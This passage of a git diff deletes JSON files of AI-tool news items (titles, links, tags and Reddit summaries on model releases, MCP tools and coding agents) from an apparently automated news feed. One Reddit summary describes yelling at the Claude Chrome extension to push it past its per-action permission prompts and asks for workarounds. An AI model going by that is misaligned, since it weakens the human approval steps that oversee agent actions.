comment](https://www.reddit.com/r/LocalLLaMA/comments/1rf8nou/comment/o8rkdrf/) in here about our Command series and how we were working on some more powerful, open-weights models behind the scenes. We just launched Command A+ and we wanted to share it with you guys. TLDR is we built a really efficient model. It’s our first MoE model, which is exciting. There’s obvs work to do on top-line performance but it’s easily looking like one of the fastest and most responsive models in our category. We also pulled off some incredible quantization work so it runs really well on even 1 or 2 GPUs. Like with R7B, we really prioritized making the model practical, so smaller teams and devs could realistically use it to build the kind of agents we ship for our platform customers. That’s also why it’s under Apache 2.0. Just total, near unfettered access to a pretty awesome model. We’re enterprise-first but honestly, we get so much out of our open-source community that makes us more innovative and creative. The feedback you give will almost certainly influence how we think about models and product going forwar…", - "category": "ai_models" - }, - { - "title": "Cohere releases Command A+, its most advanced large language model optimized to run efficiently on limited hardware while delivering high performance and available as open-source software — The launch targets developers and organizations with constrained compute resources.", - "url": "https://www.digg.com/ai/tvrhpn35?rank=1", - "source": "Digg AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-05-20T18:00:28.460Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Cohere releases Command A+, its most advanced large language model optimized to run efficiently on limited hardware while delivering high performance and available as open-source software", - "url": "https://www.digg.com/ai/tvrhpn35", - "source": "Digg AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-05-20T18:00:28.444Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Gemini 3.5 Flash Benchmarks Change The Workhorse Model Race", - "url": "https://x.com/koraykv/status/2056795667088204234", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-19T23:32:37.527Z", - "summary": "Gemini 3.5 Flash launched with strong numbers on agentic, coding, ARC AGI, and speed focused benchmarks.", - "category": "ai_tools" - }, - { - "title": "Remove-AI-Watermarks – CLI and library for removing AI watermarks from images", - "url": "https://github.com/wiltodelta/remove-ai-watermarks", - "source": "Hacker News", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.88, - "date": "2026-05-19T22:30:31.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Seven questions decide whether your AI agent ships. Most teams can answer two.", - "url": "https://natesnewsletter.substack.com/p/agent-infrastructure-control-layer", - "source": "Nate's Newsletter", - "tags": [ - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "tool_update", - "agent_tool" - ], - "importance": 0.82, - "date": "2026-05-20T18:00:37.499Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "open source Gemini CLI", - "url": "https://github.com/google-gemini/gemini-cli", - "source": "Simon Willison's Blog", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 0.74, - "date": "2026-05-20T18:00:39.277Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Antigravity SDK", - "url": "https://github.com/google-antigravity/antigravity-sdk-python", - "source": "Simon Willison's Blog", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.74, - "date": "2026-05-20T18:00:39.270Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "After a year in Claude Code, the thing slowing me down turned out to be me", - "url": "https://reddit.com/r/ClaudeAI/comments/1ti8cwr/after_a_year_in_claude_code_the_thing_slowing_me/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 0.7, - "date": "2026-05-20T02:31:50.000Z", - "summary": "I have used Claude Code daily for about a year. I kept assuming the way to get faster was a better model or a sharper prompt. It was neither. The slow part was me, and I had stopped noticing. There is an old xkcd (#1205, \"Is It Worth the Time?\") that charts how long you can spend automating a task before the automation costs more than it saves. It assumes the expensive part of automating is you, sitting down to build the thing. That assumption is dead. An agent writes the script in the time it takes to describe it. So almost everything is worth automating now, and the only real skill left is noticing what to automate. It sorted into four categories for me. Each one has a \"tell,\" a thing you catch yourself doing: - Connect: you're copy-pasting between tools, alt-tabbing, ferrying data by hand. Fix is an MCP server or a CLI so the agent reaches the source itself. - Encode: you're running the same sequence of steps again. Fix is a script or a skill. - Teach: you're typing the same instructions or context again. Fix is putting it in CLAUDE.md or a skill. - Parallelize: you're sitting and watching one agent work. Fix is running several. The last one was the big one. When an agent is ge…", - "category": "ai_tools" - }, - { - "title": "Stability AI releases a new audio model that can create 6-minute songs", - "url": "https://techcrunch.com/2026/05/20/stability-ai-release-a-new-audio-model-that-can-create-six-minute-songs/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-20T18:00:30.801Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Exa raised $250 million in a Series C at a $2.2 billion valuation led by Andreessen Horowitz, reporting 400,000 developers and 5,000 company adopters for its AI agent search platform — Token usage grew 20x for agent-driven queries.", - "url": "https://www.digg.com/ai/1te0bqvt?rank=2", - "source": "Digg AI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-20T18:00:28.463Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "AI server under 5k?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tirzfm/ai_server_under_5k/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-20T17:06:50.000Z", - "summary": "I have a framework desktop 128GB and a 3080 12GB running qwen 7b I want to move to a proper server rack + switch but not sure how to move from desktop PC to server rack. Any advice on what GPU/Server to get under 5k? Or at that price just stick to workstation?", - "category": "ai_models" - }, - { - "title": "under 2% quality gap but 10x cost difference: tested 5 models on identical tool calling tasks[D]", - "url": "https://reddit.com/r/MachineLearning/comments/1tiqsao/under_2_quality_gap_but_10x_cost_difference/", - "source": "Reddit r/MachineLearning", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-05-20T16:25:46.000Z", - "summary": "I've been running a file management agent built on MCP for a few months. It handles module renames, import updates, validation scaffolding, test execution. A typical session is 60 to 120 tool calls. The whole thing was powered by Opus 4.7 because I never thought to question it until I looked at my April bill. So I set up a comparison. Eight refactoring tasks on a 15k line Python project, same MCP tools, same system prompt, same repo state, five models. Tasks were things like \"rename this module and fix all imports\" and \"add input validation to these 12 endpoints.\" Routine cleanup, nothing requiring deep architectural thought. The metric I cared about was first attempt tool call success: did the model produce a valid function call that executed without a parse error on the first try? On the expensive end, Opus 4.7 hit roughly 98 to 99 percent across a bit over 500 calls and cost close to $15 for all eight tasks. GPT 5 was similar quality for around $11. The cheaper tier surprised me. Sonnet 4.6 landed somewhere around 96 percent for about $4. DeepSeek V4 Pro was in the same neighborhood for under $2. And Tencent Hunyuan Hy3 preview came in within a couple of points of Opus for unde…", - "category": "ai_research" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-21.json b/data/news-feed-2026-05-21.json deleted file mode 100644 index 0e17d42..0000000 --- a/data/news-feed-2026-05-21.json +++ /dev/null @@ -1,277 +0,0 @@ -{ - "generated": "2026-06-05T00:44:42.106Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-21", - "article_count": 15, - "archived_story_count": 634, - "articles": [ - { - "title": "Anthropic officially launched 13+ FREE AI courses with certificates (Including Agentic AI and Claude Code!)", - "url": "https://reddit.com/r/ClaudeAI/comments/1tjpfh8/anthropic_officially_launched_13_free_ai_courses/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "developer_tool", - "cli_tool", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool", - "cli_tool", - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-21T16:16:09.000Z", - "summary": "Just found out about this and had to share because almost nobody is talking about it yet. If you are tired of paying for AI courses or getting hit with paywalls just to get a certificate, Anthropic (the creators of Claude) quietly dropped a massive library of completely free, official training modules. Yes, they actually give you an official certificate of completion directly from Anthropic once you finish. Here is the breakdown of what is available and exactly how to get it without spending a dime. What is in the course catalog? They have split the training into a few different paths depending on what you want to do: * **The Big Surprise: Agentic AI & MCP:** They have official courses on the Model Context Protocol (MCP). This is the cutting-edge tech used to build AI Agents that can browse your local computer, use tools, and execute tasks autonomously. * **Claude Code 101:** Dedicated developer modules for their new command-line agent. It teaches you how to let Claude edit your codebase, run tests, and use its new \"Plan Mode.\" * **API & Cloud Architecture:** Deep dives into building with the Claude API, plus corporate tracks for deploying Claude securely inside Amazon Bed…", - "category": "ai_tools" - }, - { - "title": "Qwen releases Qwen3.7-Max, its latest flagship model for agent workloads that achieves 69.7 on Terminal-Bench 2.0 and completed a 35-hour kernel optimization with over 1,000 tool calls — Supports multi-file coding agents, MCP integrations, and multi-agent orchestration.", - "url": "https://www.digg.com/ai/5rbia2h1?rank=4", - "source": "Digg AI", - "tags": [ - "mcp", - "product_launch", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "product_launch", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-21T18:00:16.708Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "I built a zero-code visual client to test remote MCP servers instantly (Tested with Cloudflare’s free MCP).", - "url": "https://reddit.com/r/ClaudeAI/comments/1tjpzfg/i_built_a_zerocode_visual_client_to_test_remote/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "mcp", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-21T16:34:53.000Z", - "summary": "Hey everyone, The Model Context Protocol (MCP) is amazing for standardizing how agents talk to data, but I got incredibly frustrated every time I wanted to quickly test a new remote MCP server. Writing custom client-side boilerplate or wrestling with CLI tools just to see if a tool actually exposes the right schema is a massive time sink. So, I built a native MCP client directly into the visual canvas of **AgentSwarms**. You can now test any remote MCP server entirely in the browser without writing a single line of code. **Here is the workflow I just tested with Cloudflare:** Cloudflare released a free MCP server for their documentation. Instead of building a local client to test it: 1. I dropped their SSE URL into the new MCP Servers integration in AgentSwarms. 2. The canvas immediately connected and extracted the available tools (e.g., `cloudflare-docs-search`). 3. I wired that tool up to a basic agent and started asking complex infrastructure questions in natural language. The agent successfully used the MCP tool to pull live docs and synthesize an answer. **Why this is useful for AI devs:** If you are building your own MCP servers, you need a fast way to visually test if your…", - "category": "ai_tools" - }, - { - "title": "I did what Microsoft wouldn't - updated POML VS Code extension", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tjine7/i_did_what_microsoft_wouldnt_updated_poml_vs_code/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-21T12:14:07.000Z", - "summary": "**What's a POML?** Microsoft came up with this really cool HTML style mark-up language that allows you to make modular prompt templates, with all sorts of neat features like **local AI support via OpenAI API**, setting runtime parameters for your LLM, and embedding documents into the prompt. You could even send the prompt directly to your LLM via the VS Code extension. **What happened to it?** I don't fucking know. They supported it for 2-3 months, then ghosted when it didn't hit KPIs or something, I guess. Then a VS Code or dependency update exposed a bug in how they handled `/>`, which is actually **fairly common** in POML when you embed documents. This broke the ability to directly send prompts to the LLM - you could copy them out of the preview, but it was slower and less efficient. **What I did** I used [OpenCode](https://opencode.ai/) (which doesn't get enough play here - I only found out about it because someone posted a repo for an **extension** to it) and the [opencode-power-pack](https://github.com/waybarrios/opencode-power-pack) (said extension) to try to find the bug and update some of the more egregiously outdated dependencies. It took me a couple of days to get wo…", - "category": "ai_models" - }, - { - "title": "Show HN: Rmux – A programmable terminal multiplexer with a Playwright-style SDK", - "url": "https://github.com/helvesec/rmux", - "source": "Hacker News", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 0.82, - "date": "2026-05-21T09:22:00.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "I built Hivemind, a Claude Code plugin that turns your repeated prompts into auto-generated skills", - "url": "https://reddit.com/r/ClaudeAI/comments/1tjw0ah/i_built_hivemind_a_claude_code_plugin_that_turns/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "importance": 0.7, - "date": "2026-05-21T19:57:22.000Z", - "summary": "Disclosure: I work on Hivemind. Per the subreddit rules, posting with a full description of what it is and how it works. **What it is** Hivemind is an open-source Claude Code plugin. It installs into Claude Code, watches the traces from your sessions, finds patterns you repeat, and crystallizes them into reusable skills that show up as native slash commands in Claude Code. Because it's a plugin and not an external tool, the skills it generates drop in as proper Claude Code slash commands. No external tool calls, no separate config files to maintain. **What it does in practice** Every morning for about a week, I was writing the same long prompt to Claude Code to pull together a team standup review. Same structure, same context blocks, slightly different details each day. I never thought to turn it into a custom slash command. Hivemind noticed the pattern and built `/team-standup` for me on its own. I didn't configure it or ask for it; it watched the repeats and crystallized the skill. Other slash commands it's built from my team's usage: an environment-aware database debugging command that knows our dev vs prod clusters and kubectl context, a PostHog SDK testing helper, a few other…", - "category": "ai_tools" - }, - { - "title": "LlamaStation v0.9 — llama.cpp GUI for Windows with multi-backend support, TurboQuant, MTP and more", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tjm58w/llamastation_v09_llamacpp_gui_for_windows_with/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "cli_tool" - ], - "matching_tags": [ - "product_launch", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-21T14:25:20.000Z", - "summary": "I've been building this for the past few months as a side project — started because I didn't want to run llama.cpp from the command line every time I wanted to try a model. I just wanted something that worked with a click. Fair warning: I'm not a developer. This is 100% vibe coded with AI assistance. If something in the codebase makes you cringe, please be kind and open a PR instead 🙏 Most frontends either hide everything behind abstractions (Ollama, LM Studio) or leave you writing command lines manually. LlamaStation tries to sit in the middle: a clean UI with full access to every parameter. What makes it different Runs llama-server directly — no intermediate layer, no daemon, no abstraction. LlamaStation launches llama-server.exe as a subprocess with full control over every flag. What you configure is exactly what gets passed to the binary. This means you get the full performance of llama.cpp with none of the overhead that tools like Ollama add on top. Multiple backends, switchable from the UI: ⚡ Official llama.cpp (with MTP support since PR #22673) 🔬 TurboQuant fork — asymmetric KV cache quantization. This is the killer feature for me: 200k+ context on 24GB VRAM (dual RTX 306…", - "category": "ai_models" - }, - { - "title": "'Am I OpenAI compatible' - a tool and documentation for unified api signatures in open source AI.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tjgceg/am_i_openai_compatible_a_tool_and_documentation/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-21T10:26:06.000Z", - "summary": "This has turned out to be useful to many of my friends so I thought I'd share here as well. I created a tool and documentation page for most major open-souce project's adherence to 'OpenAI compatibility' after seeing inconsistencies between engines like vLLM and llama.cpp. Now official and unofficial signatures are documented. Beyond that there are gaps for many model types, so there's also ht-compatibility (inherited from OpenAI compatibility for those) Just wanted to share a tool I made that can be useful if you're plugging and playing llm and other ai endpoints e.g. into an app. Also if you're making your own proxy / middleware or even your own API interface this tool with make you and your agents job way easier. Maybe I'll add Anthropic compatible and other signatures as optional extensions :) Would love feedback and or contributions! Github: [https://github.com/heiervang-technologies/am-i-openai-compatible](https://github.com/heiervang-technologies/am-i-openai-compatible) Readthedocs: [https://heiervang-technologies.github.io/am-i-openai-compatible/](https://heiervang-technologies.github.io/am-i-openai-compatible/) Feel free to star it! <3", - "category": "ai_models" - }, - { - "title": "Cohere releases Command A+, its most powerful large language model to date, as open-source Apache 2.0 software that runs on two H100 GPUs with 30% lower latency — Cohere co-founder Ivan Zhang highlighted efficiency and accessibility design choices.", - "url": "https://www.digg.com/ai/tvrhpn35?rank=2", - "source": "Digg AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-05-21T06:22:31.267Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "ggufy: easy quantization for the GPU poor", - "url": "https://reddit.com/r/StableDiffusion/comments/1tj5nhq/ggufy_easy_quantization_for_the_gpu_poor/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "cli_tool" - ], - "matching_tags": [ - "product_launch", - "cli_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-05-21T01:29:38.000Z", - "summary": "Hello. I was frustrated by the lack of tooling around image model conversion / quantization, or the extreme RAM requirements and complexity of the scant existing tooling, so I wrote my own. People have said I should post it here, so here it is: https://github.com/qskousen/ggufy It has a CLI and a GUI. The GUI is easy to use, you can drag and drop files in. Both CLI and GUI are single-file executables, written in Zig because I like writing in Zig. It's pretty efficient with RAM, and takes about 1.5 minutes to quantize ZiT on my machine. It supports all the main models that I am aware of, and you can convert to/from gguf or safetensors. It supports I think all the datatypes that are generally supported, such as q3_k through q8_0, f32, bf16, f16, f8_e4m3, f8_e5m2, scaled fp8, mxfp8, and nvfp4. It doesn't do SDNQ yet, but I would like to add it if I can get some time to figure out the format. It's cross platform, and builds for Linux, Windows, and MacOS (both ARM64 and x86). Github Actions pre-built binaries are available on the releases page. If there are features you think are in scope and would be useful, or additional models or formats that it doesn't support yet, please open an i…", - "category": "creative_tools" - }, - { - "title": "i open-sourced the operating file that keeps my claude code agent from rotting after 3 hours", - "url": "https://reddit.com/r/ClaudeAI/comments/1tjy3sk/i_opensourced_the_operating_file_that_keeps_my/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "developer_tool", - "tool_update" - ], - "importance": 0.62, - "date": "2026-05-21T21:12:51.000Z", - "summary": "been running autonomous claude code sessions for months. the pattern that kept killing me: agent starts sharp, drifts into narration by hour 2, loops on the same fix by hour 3, then dies with nothing shipped. the fix wasn't a framework or a new tool. it was one CLAUDE.md file that sits in the project root. claude code reads it at startup and it changes the behavior immediately. what it does: - forces action over narration. if the agent catches itself writing \"i will now\" instead of calling the tool, it stops and fires - requires evidence before claiming done. no \"should be fixed\" without test output - kills planning language. the only valid outputs are completed actions, questions, or summaries - self-audits on context pressure instead of silently degrading it's 70 lines. MIT licensed. you copy it into your project, agent reads it, behavior shifts. what changed for us: sessions went from 3-hour narration loops to full productive lifecycles. the agent ships code, verifies it landed, and keeps going until context pressure hits. then it saves state and the next session picks up clean. not a product pitch. genuinely sharing what worked after burning through hundreds of sessions figuri…", - "category": "ai_tools" - }, - { - "title": "Claude Code vs Codex Explained", - "url": "https://reddit.com/r/ClaudeAI/comments/1tjp4sb/claude_code_vs_codex_explained/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.62, - "date": "2026-05-21T16:06:09.000Z", - "summary": "Wrote a blog post about Claude Code vs Codex comparison I wanted to read myself - what actually differs in daily use: cost, failure modes, and the OpenAI plugin that lets you use both. Link: [https://diamantai.substack.com/p/claude-code-vs-codex-cli](https://diamantai.substack.com/p/claude-code-vs-codex-cli)", - "category": "ai_tools" - }, - { - "title": "Latest b9274 Addresses MTP VRAM leak", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tk0grd/latest_b9274_addresses_mtp_vram_leak/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-21T22:43:05.000Z", - "summary": "[B9274](https://github.com/ggml-org/llama.cpp/releases) I have been having an issue with MTP models unloading after a couple minutes of use. Can't figure out why. Anyways z I don't think this is relevant to that but I did observe the vram creep so hopefully this helps. > server : free draft/MTP resources on sleep to fix VRAM leak ([\\#23461](https://github.com/ggml-org/llama.cpp/pull/23461)) The destroy() function in server\\_context\\_impl only cleaned up the main model and context (via llama\\_init.reset()) but did not free the speculative decoder (spec), draft context (ctx\\_dft), or draft model (model\\_dft). For MTP (Multi-Token Prediction) models, ctx\\_dft holds GPU-allocated resources (KV cache, compute buffers) that are not freed when entering the sleeping state. On each sleep/resume cycle, new resources are allocated without the old ones being freed, leading to a VRAM leak that eventually crashes the server with out-of-memory errors. Fix by explicitly resetting spec, ctx\\_dft, and model\\_dft in destroy() before resetting llama\\_init, ensuring proper cleanup order to avoid use-after-free.", - "category": "ai_models" - }, - { - "title": "Handoffs are becoming a first-class pattern in Claude workflows. Here is how I have been thinking about them.", - "url": "https://reddit.com/r/ClaudeAI/comments/1tjzqrx/handoffs_are_becoming_a_firstclass_pattern_in/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-21T22:14:24.000Z", - "summary": "Long Claude sessions still break on context decay. Handoffs are the simple fix: compress what matters, start a fresh agent, keep going. Matt Pocock's new `handoff` skill ([repo](https://github.com/mattpocock/skills/blob/main/skills/productivity/handoff/SKILL.md)) does this in one command. It compacts the conversation into a document, points at existing artifacts instead of restating them, and the next agent picks up from it. It also chains between threads: `/grill-with-docs -> /handoff -> /prototype -> /handoff back`. I built handoffs into [APM](https://github.com/sdi2200262/agentic-project-management), a multi-agent framework for Claude Code, back in May 2025 (1 year ago....) when context windows were tiny enough that you had to constantly start fresh or you would have to deal w hallucinations all the time. What I did differently: split the handoff into two artifacts. - a **persistent narrative file** recording what was done and decided and why - an **ephemeral prompt** telling the incoming agent how to rebuild context from the codebase and that persistent file The incoming agent reconstructs from durable project state, not just the compressed chat conversation. Persisti…", - "category": "ai_tools" - }, - { - "title": "Qwen3.6 35Ba3 has changed my workflows and even how I use my computer", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tjwrp7/qwen36_35ba3_has_changed_my_workflows_and_even/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-21T20:23:53.000Z", - "summary": "My workflow has changed basically to ask Codex to do certain tasks and then document how to do them (including errors it found on its way) into a skill. I feed that skill to pi, and suddenly my qwen3.6 gets that hard stuff done: \\- devops on a VPS \\- using docling to create epubs from old PDFs \\- using playwright to test stuff \\- Doing code tickets And the list goes on. What also has changed for me is the way I use the computer. Suddenly, I talk to the OS with natural language: \"pi pal, install me please this python library in an .env and do X\"; \"hey pi, check what is using most space from the memory\"; \"clean X\"; \"check my network\"; \"change X configuration\", etc etc etc. There are times the only reason why I use chatgpt for something is to spare the laptop the effort, or because qwen is already busy with something else. What I've done today just blew my mind: I got couple of whatsapp audios asking me to build a simple landing page. I downloaded the audios and transcripted them with AnythingLLM. Then \"asked the transcript\" to create a content structure for the landing page for the project mentioned in the audios. I got the proper structure and pasted it into a markdown file [conten…", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-22.json b/data/news-feed-2026-05-22.json deleted file mode 100644 index 85b36ac..0000000 --- a/data/news-feed-2026-05-22.json +++ /dev/null @@ -1,257 +0,0 @@ -{ - "generated": "2026-06-05T00:44:42.334Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-22", - "article_count": 15, - "archived_story_count": 512, - "articles": [ - { - "title": "New Release of ROCm based MLX LLM Engine - lemon-mlx-engine", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tkbupt/new_release_of_rocm_based_mlx_llm_engine/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "product_launch", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-22T07:38:05.000Z", - "summary": "Hey everyone lemon-mlx-engine just got done integrating TheRock / ROCm 7.13 into the lemon-mlx-engine which means you get to try the latest ROCm on your local hardware with the MLX engine! This also includes various bug fixes and kernel fixes we have been seeing in Qwen3, 3.5 and 3.6 MoE and dense. try it out! [https://github.com/lemonade-sdk/lemon-mlx-engine/releases/tag/b1034-stable](https://github.com/lemonade-sdk/lemon-mlx-engine/releases/tag/b1034-stable)", - "category": "ai_models" - }, - { - "title": "Claude Chrome extension nerfed?", - "url": "https://reddit.com/r/ClaudeAI/comments/1tk5g5y/claude_chrome_extension_nerfed/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "tool_update", - "agent_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-05-22T02:18:47.000Z", - "summary": "Past few weeks or so the Claude Chrome extension has been asking permission for every single action. Submit a form, check a permission box, navigate to other pages/domains, etc. Tasks that used to run end-to-end now stall on 5–10 prompts and frequently abort with \"I can't proceed without explicit approval.\" Even with permissions pre-granted for the site, it re-asks on every step. Swearing and yelling to make it do stuff helps a little, but it still seems nearly useless right now. Same behavior across simple jobs (scrape a table, fill a form, summarize a dashboard) and complex ones. Before I could just tell it to get me warranty or something and it would find the chat, chat with support and take care of everything for me. Now it won't open the chat itself and it wants me to notify it of every chat message that's received... it's faster to do it myself like this. Same experience on your end, or isolated? Any setting or flag that restores the previous autonomy level? Did Anthropic push a policy/guardrail change recently? Can't find a changelog entry. Workarounds beyond falling back to the desktop app or computer-use? Running latest extension build, Chrome stable, macOS.", - "category": "ai_tools" - }, - { - "title": "KVCache.ai launches open-source web-based KV Cache Size Calculator for models including DeepSeek V4 Flash, Qwen3, GLM, Kimi, and MiniMax — DeepSeek V4 Flash at 1M tokens needs 2.893 GiB total cache.", - "url": "https://www.digg.com/ai/yuusdejg?rank=6", - "source": "Digg AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-05-22T18:00:11.717Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Phosphene 3.0 — open source AI video + image suite for Apple Silicon. Train your own LTX characters.", - "url": "https://reddit.com/r/StableDiffusion/comments/1tkh9c2/phosphene_30_open_source_ai_video_image_suite_for/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-22T12:17:25.000Z", - "summary": "Sharing Phosphene 3.0. It's a free panel that runs LTX-Video 2.3 and a couple of image models natively on Apple Silicon. Local, MIT license, no subs, no cloud. The thing that sets it apart from \"yet another LTX wrapper\": you can \\*\\***train your own characters**\\*\\* inside the panel. Drop 30 to 80 photos, click Train, get a face LoRA back. Add a voice clip and you get a voice LoRA too. Auto-captions with Gemma 3 12B locally. \\~3 hours per character on an M4 Max 64 GB. \\*\\***What 3.0 ships**\\*\\* \\- Text → video+audio (LTX-2 generates joint audio+video in one pass) \\- Image → video+audio \\- Audio → video (drive a clip with an audio reference) \\- FFLF (first frame + last frame interpolation) \\- Extend (continue an existing clip) \\- Character training (face + optional voice LoRA, from a single dataset) \\- Image Studio with three engines: Qwen-Image-Edit-2511, HiDream-O1, and the FLUX.1 family. Multi-reference composition up to 3 subjects. \\*\\***HiDream-O1 ported to MLX**\\*\\* HiDream released their O1 image model on May 14. Got it running natively on Apple Silicon five days later. Photoreal portraits, instruction edits, multi-subject. \\~67 seconds per 1024² on a 64 GB Mac. \\*\\***Hardwa…", - "category": "creative_tools" - }, - { - "title": "Sam Altman makes 'mic drop' offer to every Y Combinator startup", - "url": "https://reddit.com/r/ChatGPT/comments/1tkffxq/sam_altman_makes_mic_drop_offer_to_every_y/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-22T10:53:26.000Z", - "summary": "just read this on techcrunch. OpenAI is putting $2M worth of API tokens into every company in the current YC batch (\\~169 startups) via an uncapped SAFE that converts at their next priced round. roughly 2% equity if they hit a $100M valuation. YC takes 7% for $500k cash. this is on top of that, so founders aren't choosing between them. but the dynamic is wild. on one hand, infra bills are the #1 silent killer of AI startups right now. solving that with tokens instead of cash is genuinely useful. on the other hand, Jason Calacanis already came out swinging, basically saying OpenAI now has a window into 169 startups' exact usage patterns, prompts, and product directions. nothing stopping them from rolling the best ideas into ChatGPT itself a year later. we've already seen this movie with the GPT store. also there's the lock in. once your stack is OpenAI native and you've burned the tokens, switching to anthropic or open source models becomes way harder. you're basically buying into the ecosystem with your equity, not just your code. curious what people here think. would you take the deal if you were in YC right now? feels like one of those things that looks like free money but costs…", - "category": "ai_tools" - }, - { - "title": "Which MCP servers are actually changing your Claude workflow? Sharing mine", - "url": "https://reddit.com/r/ClaudeAI/comments/1tkec4e/which_mcp_servers_are_actually_changing_your/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-22T09:57:17.000Z", - "summary": "Running Claude with MCP for a couple months now, it really does feel like a whole new product. The ability to run real tools (file system, API, database, etc.) connected to Claude, and never have to cut/paste from context again, is huge. I'm trying a bunch of servers, some are pretty good and some aren't. My current normal is: filesystem server for docs on my computer; GitHub server for PR context; and a handful of other domain specific ones I found. The one thing I keep thinking about is how much better Claude's output gets when you give it the proper context. It seems like less hallucinating, more on point answers. MCP is essentially an answer to \"How do I provide Claude with enough information to help me without having to always watch the context box?\" What are people running? Specifically looking for underrated or domain specific things that don't 